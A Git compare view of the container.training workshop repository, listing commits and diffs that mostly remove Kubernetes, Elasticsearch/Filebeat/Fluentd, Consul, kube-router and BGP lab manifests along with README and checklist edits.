Compare commits

..

12 Commits

Author SHA1 Message Date
Jerome Petazzoni
0900d605ef fix-redirects.sh: adding forced redirect 2020-04-07 16:48:55 -05:00
Jerome Petazzoni
f67cfa8693 Add Lucas' amazing diagram 2018-02-21 18:17:57 -08:00
Jerome Petazzoni
cb8690f4a3 Add Lucas' amazing diagram 2018-02-21 18:16:59 -08:00
Jérôme Petazzoni
7a6d488d60 Merge pull request #112 from bridgetkromhout/indexconf2018
Clarification
2018-02-21 18:12:45 -08:00
Bridget Kromhout
b1d8b5eec8 Merge branch 'master' of https://github.com/jpetazzo/container.training into indexconf2018 2018-02-21 18:10:04 -08:00
Bridget Kromhout
1983d6cb4f Detail fix 2018-02-21 18:06:12 -08:00
Jérôme Petazzoni
e565da49ca Merge pull request #111 from bridgetkromhout/indexconf2018
Indexconf2018
2018-02-20 15:07:49 -08:00
Bridget Kromhout
ee33799a8f Only 2 worker nodes 2018-02-20 15:34:05 -06:00
Bridget Kromhout
b61426a044 emoji fix 2018-02-19 19:41:39 -06:00
Bridget Kromhout
fd057d8a1e Slight edits 2018-02-19 19:40:16 -06:00
Jerome Petazzoni
4b76fbcc4b Add _redirects 2018-02-19 15:50:22 -08:00
Bridget Kromhout
b25d40f48e indexconf2017 2018-02-18 20:21:55 -06:00
385 changed files with 4816 additions and 66168 deletions

21
.gitignore vendored
View File

@@ -1,24 +1,11 @@
*.pyc
*.swp
*~
prepare-vms/ips.txt
prepare-vms/ips.html
prepare-vms/ips.pdf
prepare-vms/settings.yaml
prepare-vms/tags
prepare-vms/infra
prepare-vms/www
slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
slides/slides.zip
node_modules
### macOS ###
# General
.DS_Store
.AppleDouble
.LSOverride
### Windows ###
# Windows thumbnail cache files
Thumbs.db
ehthumbs.db
ehthumbs_vista.db

View File

@@ -1 +0,0 @@
image: jpetazzo/shpod

View File

@@ -1,24 +0,0 @@
Checklist to use when delivering a workshop
Authored by Jérôme; additions by Bridget
- [ ] Create event-named branch (such as `conferenceYYYY`) in the [main repo](https://github.com/jpetazzo/container.training/)
- [ ] Create file `slides/_redirects` containing a link to the desired tutorial: `/ /kube-halfday.yml.html 200`
- [ ] Push local branch to GitHub and merge into main repo
- [ ] [Netlify setup](https://app.netlify.com/sites/container-training/settings/domain): create subdomain for event-named branch
- [ ] Add link to event-named branch to [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
- [ ] Update the slides that says which versions we are using for [kube](https://github.com/jpetazzo/container.training/blob/master/slides/kube/versions-k8s.md) or [swarm](https://github.com/jpetazzo/container.training/blob/master/slides/swarm/versions.md) workshops
- [ ] Update the version of Compose and Machine in [settings](https://github.com/jpetazzo/container.training/tree/master/prepare-vms/settings)
- [ ] (optional) Create chatroom
- [ ] (optional) Set chatroom in YML ([kube half-day example](https://github.com/jpetazzo/container.training/blob/master/slides/kube-halfday.yml#L6-L8)) and deploy
- [ ] (optional) Put chat link on [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
- [ ] How many VMs do we need? Check with event organizers ahead of time
- [ ] Provision VMs (slightly more than we think we'll need)
- [ ] Change password on presenter's VMs (to forestall any hijinx)
- [ ] Onsite: walk the room to count seats, check power supplies, lectern, A/V setup
- [ ] Print cards
- [ ] Cut cards
- [ ] Last-minute merge from master
- [ ] Check that all looks good
- [ ] DELIVER!
- [ ] Shut down VMs
- [ ] Update index.html to remove chat link and move session to past things

View File

@@ -39,7 +39,7 @@ your own tutorials.
All these materials have been gathered in a single repository
because they have a few things in common:
- some [shared slides](slides/shared/) that are re-used
- some [common slides](slides/common/) that are re-used
(and updated) identically between different decks;
- a [build system](slides/) generating HTML slides from
Markdown source files;
@@ -199,7 +199,7 @@ this section is for you!
locked-down computer, host firewall, etc.
- Horrible wifi, or ssh port TCP/22 not open on network! If wifi sucks you
can try using MOSH https://mosh.org which handles SSH over UDP. TMUX can also
prevent you from losing your place if you get disconnected from servers.
prevent you from loosing your place if you get disconnected from servers.
https://tmux.github.io
- Forget to print "cards" and cut them up for handing out IP's.
- Forget to have fun and focus on your students!
@@ -247,17 +247,6 @@ content but you also know to skip during presentation.
- Last 15-30 minutes is for stateful services, DAB files, and questions.
### Pre-built images
There are pre-built images for the 4 components of the DockerCoins demo app: `dockercoins/hasher:v0.1`, `dockercoins/rng:v0.1`, `dockercoins/webui:v0.1`, and `dockercoins/worker:v0.1`. They correspond to the code in this repository.
There are also three variants, for demo purposes:
- `dockercoins/rng:v0.2` is broken (the server won't even start),
- `dockercoins/webui:v0.2` has bigger font on the Y axis and a green graph (instead of blue),
- `dockercoins/worker:v0.2` is 11x slower than `v0.1`.
## Past events
Since its inception, this workshop has been delivered dozens of times,
@@ -292,31 +281,15 @@ If there is a bug and you can't even reproduce it:
sorry. It is probably an Heisenbug. We can't act on it
until it's reproducible, alas.
If you have attended this workshop and have feedback,
or if you want somebody to deliver that workshop at your
conference or for your company: you can contact one of us!
# “Please teach us!”
If you have attended one of these workshops, and want
your team or organization to attend a similar one, you
can look at the list of upcoming events on
http://container.training/.
You are also welcome to reuse these materials to run
your own workshop, for your team or even at a meetup
or conference. In that case, you might enjoy watching
[Bridget Kromhout's talk at KubeCon 2018 Europe](
https://www.youtube.com/watch?v=mYsp_cGY2O0), explaining
precisely how to run such a workshop yourself.
Finally, you can also contact the following persons,
who are experienced speakers, are familiar with the
material, and are available to deliver these workshops
at your conference or for your company:
- jerome dot petazzoni at gmail dot com
- jerome at docker dot com
- bret at bretfisher dot com
(If you are willing and able to deliver such workshops,
feel free to submit a PR to add your name to that list!)
If you are willing and able to deliver such workshops,
feel free to submit a PR to add your name to that list!
**Thank you!**

View File

@@ -1,9 +0,0 @@
hostname frr
router bgp 64512
network 1.0.0.2/32
bgp log-neighbor-changes
neighbor kube peer-group
neighbor kube remote-as 64512
neighbor kube route-reflector-client
bgp listen range 0.0.0.0/0 peer-group kube
log stdout

View File

@@ -1,2 +0,0 @@
hostname frr
log stdout

View File

@@ -1,34 +0,0 @@
version: "3"
services:
bgpd:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
restart: always
zebra:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
restart: always
vtysh:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: vtysh -c "show ip bgp"
chmod:
image: alpine
volumes:
- ./run:/var/run/frr
command: chmod 777 /var/run/frr

View File

@@ -1,29 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.4.3
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
"Edit the CLUSTER placeholder first. Then, remove this line.":
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-scheduler --master http://localhost:8080

View File

@@ -1,128 +0,0 @@
---
apiVersion: |+
Make sure you update the line with --master=http://X.X.X.X:8080 below.
Then remove this section from this YAML file and try again.
---
apiVersion: v1
kind: ConfigMap
metadata:
name: kube-router-cfg
namespace: kube-system
labels:
k8s-app: kube-router
data:
cni-conf.json: |
{
"cniVersion":"0.3.0",
"name":"mynet",
"plugins":[
{
"name":"kubernetes",
"type":"bridge",
"bridge":"kube-bridge",
"isDefaultGateway":true,
"ipam":{
"type":"host-local"
}
}
]
}
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
labels:
k8s-app: kube-router
name: kube-router
namespace: kube-system
spec:
selector:
matchLabels:
k8s-app: kube-router
template:
metadata:
labels:
k8s-app: kube-router
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ''
spec:
serviceAccountName: kube-router
containers:
- name: kube-router
image: docker.io/cloudnativelabs/kube-router
imagePullPolicy: Always
args:
- "--run-router=true"
- "--run-firewall=true"
- "--run-service-proxy=true"
- "--master=http://X.X.X.X:8080"
env:
- name: NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
- name: KUBE_ROUTER_CNI_CONF_FILE
value: /etc/cni/net.d/10-kuberouter.conflist
livenessProbe:
httpGet:
path: /healthz
port: 20244
initialDelaySeconds: 10
periodSeconds: 3
resources:
requests:
cpu: 250m
memory: 250Mi
securityContext:
privileged: true
volumeMounts:
- name: lib-modules
mountPath: /lib/modules
readOnly: true
- name: cni-conf-dir
mountPath: /etc/cni/net.d
initContainers:
- name: install-cni
image: busybox
imagePullPolicy: Always
command:
- /bin/sh
- -c
- set -e -x;
if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
if [ -f /etc/cni/net.d/*.conf ]; then
rm -f /etc/cni/net.d/*.conf;
fi;
TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
cp /etc/kube-router/cni-conf.json ${TMP};
mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
fi
volumeMounts:
- mountPath: /etc/cni/net.d
name: cni-conf-dir
- mountPath: /etc/kube-router
name: kube-router-cfg
hostNetwork: true
tolerations:
- key: CriticalAddonsOnly
operator: Exists
- effect: NoSchedule
key: node-role.kubernetes.io/master
operator: Exists
- effect: NoSchedule
key: node.kubernetes.io/not-ready
operator: Exists
volumes:
- name: lib-modules
hostPath:
path: /lib/modules
- name: cni-conf-dir
hostPath:
path: /etc/cni/net.d
- name: kube-router-cfg
configMap:
name: kube-router-cfg

View File

@@ -1,28 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.4.3
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-controller-manager --master http://localhost:8080
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-scheduler --master http://localhost:8080

View File

@@ -5,3 +5,6 @@ RUN gem install thin
ADD hasher.rb /
CMD ["ruby", "hasher.rb"]
EXPOSE 80
HEALTHCHECK \
--interval=1s --timeout=2s --retries=3 --start-period=1s \
CMD curl http://localhost/ || exit 1

View File

@@ -28,5 +28,5 @@ def rng(how_many_bytes):
if __name__ == "__main__":
app.run(host="0.0.0.0", port=80, threaded=False)
app.run(host="0.0.0.0", port=80)

View File

@@ -2,14 +2,14 @@ version: "2"
services:
elasticsearch:
image: elasticsearch:2
image: elasticsearch
# If you need to access ES directly, just uncomment those lines.
#ports:
# - "9200:9200"
# - "9300:9300"
logstash:
image: logstash:2
image: logstash
command: |
-e '
input {
@@ -47,7 +47,7 @@ services:
- "12201:12201/udp"
kibana:
image: kibana:4
image: kibana
ports:
- "5601:5601"
environment:

View File

@@ -1,21 +0,0 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: whatever
annotations:
traefik.ingress.kubernetes.io/service-weights: |
whatever: 90%
whatever-new: 10%
spec:
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: whatever
servicePort: 80
- path: /
backend:
serviceName: whatever-new
servicePort: 80

View File

@@ -1,15 +0,0 @@
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
name: coffees.container.training
spec:
group: container.training
version: v1alpha1
scope: Namespaced
names:
plural: coffees
singular: coffee
kind: Coffee
shortNames:
- cof

View File

@@ -1,35 +0,0 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
name: coffees.container.training
spec:
group: container.training
scope: Namespaced
names:
plural: coffees
singular: coffee
kind: Coffee
shortNames:
- cof
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
properties:
spec:
required:
- taste
properties:
taste:
description: Subjective taste of that kind of coffee bean
type: string
additionalPrinterColumns:
- jsonPath: .spec.taste
description: Subjective taste of that kind of coffee bean
name: Taste
type: string
- jsonPath: .metadata.creationTimestamp
name: Age
type: date

View File

@@ -1,29 +0,0 @@
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: arabica
spec:
taste: strong
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: robusta
spec:
taste: stronger
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: liberica
spec:
taste: smoky
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: excelsa
spec:
taste: fruity

View File

@@ -1,86 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: consul
subjects:
- kind: ServiceAccount
name: consul
namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: app
operator: In
values:
- consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.6"
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command:
- /bin/sh
- -c
- consul leave

View File

@@ -1,28 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: build-image
spec:
restartPolicy: OnFailure
containers:
- name: docker-build
image: docker
env:
- name: REGISTRY_PORT
value: #"30000"
command: ["sh", "-c"]
args:
- |
apk add --no-cache git &&
mkdir /workspace &&
git clone https://github.com/jpetazzo/container.training /workspace &&
docker build -t localhost:$REGISTRY_PORT/worker /workspace/dockercoins/worker &&
docker push localhost:$REGISTRY_PORT/worker
volumeMounts:
- name: docker-socket
mountPath: /var/run/docker.sock
volumes:
- name: docker-socket
hostPath:
path: /var/run/docker.sock

View File

@@ -1,160 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: hasher
name: hasher
spec:
replicas: 1
selector:
matchLabels:
app: hasher
template:
metadata:
labels:
app: hasher
spec:
containers:
- image: dockercoins/hasher:v0.1
name: hasher
---
apiVersion: v1
kind: Service
metadata:
labels:
app: hasher
name: hasher
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: hasher
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: redis
name: redis
spec:
replicas: 1
selector:
matchLabels:
app: redis
template:
metadata:
labels:
app: redis
spec:
containers:
- image: redis
name: redis
---
apiVersion: v1
kind: Service
metadata:
labels:
app: redis
name: redis
spec:
ports:
- port: 6379
protocol: TCP
targetPort: 6379
selector:
app: redis
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rng
name: rng
spec:
replicas: 1
selector:
matchLabels:
app: rng
template:
metadata:
labels:
app: rng
spec:
containers:
- image: dockercoins/rng:v0.1
name: rng
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rng
name: rng
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: rng
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: webui
name: webui
spec:
replicas: 1
selector:
matchLabels:
app: webui
template:
metadata:
labels:
app: webui
spec:
containers:
- image: dockercoins/webui:v0.1
name: webui
---
apiVersion: v1
kind: Service
metadata:
labels:
app: webui
name: webui
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: webui
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: worker
name: worker
spec:
replicas: 1
selector:
matchLabels:
app: worker
template:
metadata:
labels:
app: worker
spec:
containers:
- image: dockercoins/worker:v0.1
name: worker

View File

@@ -1,69 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: cerebro
name: cerebro
spec:
selector:
matchLabels:
app: cerebro
template:
metadata:
labels:
app: cerebro
spec:
volumes:
- name: conf
configMap:
name: cerebro
containers:
- image: lmenezes/cerebro
name: cerebro
volumeMounts:
- name: conf
mountPath: /conf
args:
- -Dconfig.file=/conf/application.conf
env:
- name: ELASTICSEARCH_PASSWORD
valueFrom:
secretKeyRef:
name: demo-es-elastic-user
key: elastic
---
apiVersion: v1
kind: Service
metadata:
labels:
app: cerebro
name: cerebro
spec:
ports:
- port: 9000
protocol: TCP
targetPort: 9000
selector:
app: cerebro
type: NodePort
---
apiVersion: v1
kind: ConfigMap
metadata:
name: cerebro
data:
application.conf: |
secret = "ki:s:[[@=Ag?QI`W2jMwkY:eqvrJ]JqoJyi2axj3ZvOv^/KavOT4ViJSv?6YY4[N"
hosts = [
{
host = "http://demo-es-http.eck-demo.svc.cluster.local:9200"
name = "demo"
auth = {
username = "elastic"
password = ${?ELASTICSEARCH_PASSWORD}
}
}
]

View File

@@ -1,19 +0,0 @@
apiVersion: elasticsearch.k8s.elastic.co/v1
kind: Elasticsearch
metadata:
name: demo
namespace: eck-demo
spec:
http:
tls:
selfSignedCertificate:
disabled: true
nodeSets:
- name: default
count: 1
config:
node.data: true
node.ingest: true
node.master: true
node.store.allow_mmap: false
version: 7.5.1

View File

@@ -1,168 +0,0 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-config
namespace: eck-demo
labels:
k8s-app: filebeat
data:
filebeat.yml: |-
filebeat.inputs:
- type: container
paths:
- /var/log/containers/*.log
processors:
- add_kubernetes_metadata:
host: ${NODE_NAME}
matchers:
- logs_path:
logs_path: "/var/log/containers/"
# To enable hints based autodiscover, remove `filebeat.inputs` configuration and uncomment this:
#filebeat.autodiscover:
# providers:
# - type: kubernetes
# node: ${NODE_NAME}
# hints.enabled: true
# hints.default_config:
# type: container
# paths:
# - /var/log/containers/*${data.kubernetes.container.id}.log
processors:
- add_cloud_metadata:
- add_host_metadata:
cloud.id: ${ELASTIC_CLOUD_ID}
cloud.auth: ${ELASTIC_CLOUD_AUTH}
output.elasticsearch:
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
username: ${ELASTICSEARCH_USERNAME}
password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: filebeat
namespace: eck-demo
labels:
k8s-app: filebeat
spec:
selector:
matchLabels:
k8s-app: filebeat
template:
metadata:
labels:
k8s-app: filebeat
spec:
serviceAccountName: filebeat
terminationGracePeriodSeconds: 30
hostNetwork: true
dnsPolicy: ClusterFirstWithHostNet
containers:
- name: filebeat
image: docker.elastic.co/beats/filebeat:7.5.1
args: [
"-c", "/etc/filebeat.yml",
"-e",
]
env:
- name: ELASTICSEARCH_HOST
value: demo-es-http
- name: ELASTICSEARCH_PORT
value: "9200"
- name: ELASTICSEARCH_USERNAME
value: elastic
- name: ELASTICSEARCH_PASSWORD
valueFrom:
secretKeyRef:
name: demo-es-elastic-user
key: elastic
- name: ELASTIC_CLOUD_ID
value:
- name: ELASTIC_CLOUD_AUTH
value:
- name: NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
securityContext:
runAsUser: 0
# If using Red Hat OpenShift uncomment this:
#privileged: true
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 100Mi
volumeMounts:
- name: config
mountPath: /etc/filebeat.yml
readOnly: true
subPath: filebeat.yml
- name: data
mountPath: /usr/share/filebeat/data
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
- name: varlog
mountPath: /var/log
readOnly: true
volumes:
- name: config
configMap:
defaultMode: 0600
name: filebeat-config
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
- name: varlog
hostPath:
path: /var/log
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
- name: data
hostPath:
path: /var/lib/filebeat-data
type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: filebeat
subjects:
- kind: ServiceAccount
name: filebeat
namespace: eck-demo
roleRef:
kind: ClusterRole
name: filebeat
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: filebeat
labels:
k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
resources:
- namespaces
- pods
verbs:
- get
- watch
- list
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: filebeat
namespace: eck-demo
labels:
k8s-app: filebeat
---

View File

@@ -1,17 +0,0 @@
apiVersion: kibana.k8s.elastic.co/v1
kind: Kibana
metadata:
name: demo
spec:
version: 7.5.1
count: 1
elasticsearchRef:
name: demo
namespace: eck-demo
http:
service:
spec:
type: NodePort
tls:
selfSignedCertificate:
disabled: true

File diff suppressed because it is too large Load Diff

View File

@@ -1,176 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: fluentd
namespace: default
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: fluentd
rules:
- apiGroups:
- ""
resources:
- pods
- namespaces
verbs:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: fluentd
roleRef:
kind: ClusterRole
name: fluentd
apiGroup: rbac.authorization.k8s.io
subjects:
- kind: ServiceAccount
name: fluentd
namespace: default
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: fluentd
namespace: default
labels:
app: fluentd
spec:
selector:
matchLabels:
app: fluentd
template:
metadata:
labels:
app: fluentd
spec:
serviceAccount: fluentd
serviceAccountName: fluentd
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
containers:
- name: fluentd
image: fluent/fluentd-kubernetes-daemonset:v1.4-debian-elasticsearch-1
env:
- name: FLUENT_ELASTICSEARCH_HOST
value: "elasticsearch"
- name: FLUENT_ELASTICSEARCH_PORT
value: "9200"
- name: FLUENT_ELASTICSEARCH_SCHEME
value: "http"
- name: FLUENT_UID
value: "0"
- name: FLUENTD_SYSTEMD_CONF
value: "disable"
- name: FLUENTD_PROMETHEUS_CONF
value: "disable"
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
volumeMounts:
- name: varlog
mountPath: /var/log
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
terminationGracePeriodSeconds: 30
volumes:
- name: varlog
hostPath:
path: /var/log
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: elasticsearch
name: elasticsearch
namespace: default
spec:
selector:
matchLabels:
app: elasticsearch
template:
metadata:
labels:
app: elasticsearch
spec:
containers:
- image: elasticsearch:5
name: elasticsearch
resources:
limits:
memory: 2Gi
requests:
memory: 1Gi
env:
- name: ES_JAVA_OPTS
value: "-Xms1g -Xmx1g"
---
apiVersion: v1
kind: Service
metadata:
labels:
app: elasticsearch
name: elasticsearch
namespace: default
spec:
ports:
- port: 9200
protocol: TCP
targetPort: 9200
selector:
app: elasticsearch
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: kibana
name: kibana
namespace: default
spec:
selector:
matchLabels:
app: kibana
template:
metadata:
labels:
app: kibana
spec:
containers:
- env:
- name: ELASTICSEARCH_URL
value: http://elasticsearch:9200/
image: kibana:5
name: kibana
resources: {}
---
apiVersion: v1
kind: Service
metadata:
labels:
app: kibana
name: kibana
namespace: default
spec:
ports:
- port: 5601
protocol: TCP
targetPort: 5601
selector:
app: kibana
type: NodePort

View File

@@ -1,21 +0,0 @@
apiVersion: enterprises.upmc.com/v1
kind: ElasticsearchCluster
metadata:
name: es
spec:
kibana:
image: docker.elastic.co/kibana/kibana-oss:6.1.3
image-pull-policy: Always
cerebro:
image: upmcenterprises/cerebro:0.7.2
image-pull-policy: Always
elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
image-pull-policy: Always
client-node-replicas: 2
master-node-replicas: 3
data-node-replicas: 3
network-host: 0.0.0.0
use-ssl: false
data-volume-size: 10Gi
java-options: "-Xms512m -Xmx512m"

View File

@@ -1,94 +0,0 @@
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
---
apiVersion: v1
kind: Namespace
metadata:
name: elasticsearch-operator
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: elasticsearch-operator
rules:
- apiGroups: ["extensions"]
resources: ["deployments", "replicasets", "daemonsets"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["apiextensions.k8s.io"]
resources: ["customresourcedefinitions"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "create", "delete", "deletecollection"]
- apiGroups: [""]
resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["batch"]
resources: ["cronjobs", "jobs"]
verbs: ["create", "get", "deletecollection", "delete"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["list", "get", "watch"]
- apiGroups: ["apps"]
resources: ["statefulsets", "deployments"]
verbs: ["*"]
- apiGroups: ["enterprises.upmc.com"]
resources: ["elasticsearchclusters"]
verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: elasticsearch-operator
subjects:
- kind: ServiceAccount
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
spec:
replicas: 1
template:
metadata:
labels:
name: elasticsearch-operator
spec:
containers:
- name: operator
image: upmcenterprises/elasticsearch-operator:0.2.0
imagePullPolicy: Always
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
ports:
- containerPort: 8000
name: http
livenessProbe:
httpGet:
path: /live
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 10
readinessProbe:
httpGet:
path: /ready
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 5
serviceAccount: elasticsearch-operator

View File

@@ -1,167 +0,0 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-config
namespace: kube-system
labels:
k8s-app: filebeat
data:
filebeat.yml: |-
filebeat.config:
inputs:
# Mounted `filebeat-inputs` configmap:
path: ${path.config}/inputs.d/*.yml
# Reload inputs configs as they change:
reload.enabled: false
modules:
path: ${path.config}/modules.d/*.yml
# Reload module configs as they change:
reload.enabled: false
# To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
#filebeat.autodiscover:
# providers:
# - type: kubernetes
# hints.enabled: true
processors:
- add_cloud_metadata:
cloud.id: ${ELASTIC_CLOUD_ID}
cloud.auth: ${ELASTIC_CLOUD_AUTH}
output.elasticsearch:
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
username: ${ELASTICSEARCH_USERNAME}
password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-inputs
namespace: kube-system
labels:
k8s-app: filebeat
data:
kubernetes.yml: |-
- type: docker
containers.ids:
- "*"
processors:
- add_kubernetes_metadata:
in_cluster: true
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
spec:
template:
metadata:
labels:
k8s-app: filebeat
spec:
serviceAccountName: filebeat
terminationGracePeriodSeconds: 30
containers:
- name: filebeat
image: docker.elastic.co/beats/filebeat-oss:7.0.1
args: [
"-c", "/etc/filebeat.yml",
"-e",
]
env:
- name: ELASTICSEARCH_HOST
value: elasticsearch-es.default.svc.cluster.local
- name: ELASTICSEARCH_PORT
value: "9200"
- name: ELASTICSEARCH_USERNAME
value: elastic
- name: ELASTICSEARCH_PASSWORD
value: changeme
- name: ELASTIC_CLOUD_ID
value:
- name: ELASTIC_CLOUD_AUTH
value:
securityContext:
runAsUser: 0
# If using Red Hat OpenShift uncomment this:
#privileged: true
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 100Mi
volumeMounts:
- name: config
mountPath: /etc/filebeat.yml
readOnly: true
subPath: filebeat.yml
- name: inputs
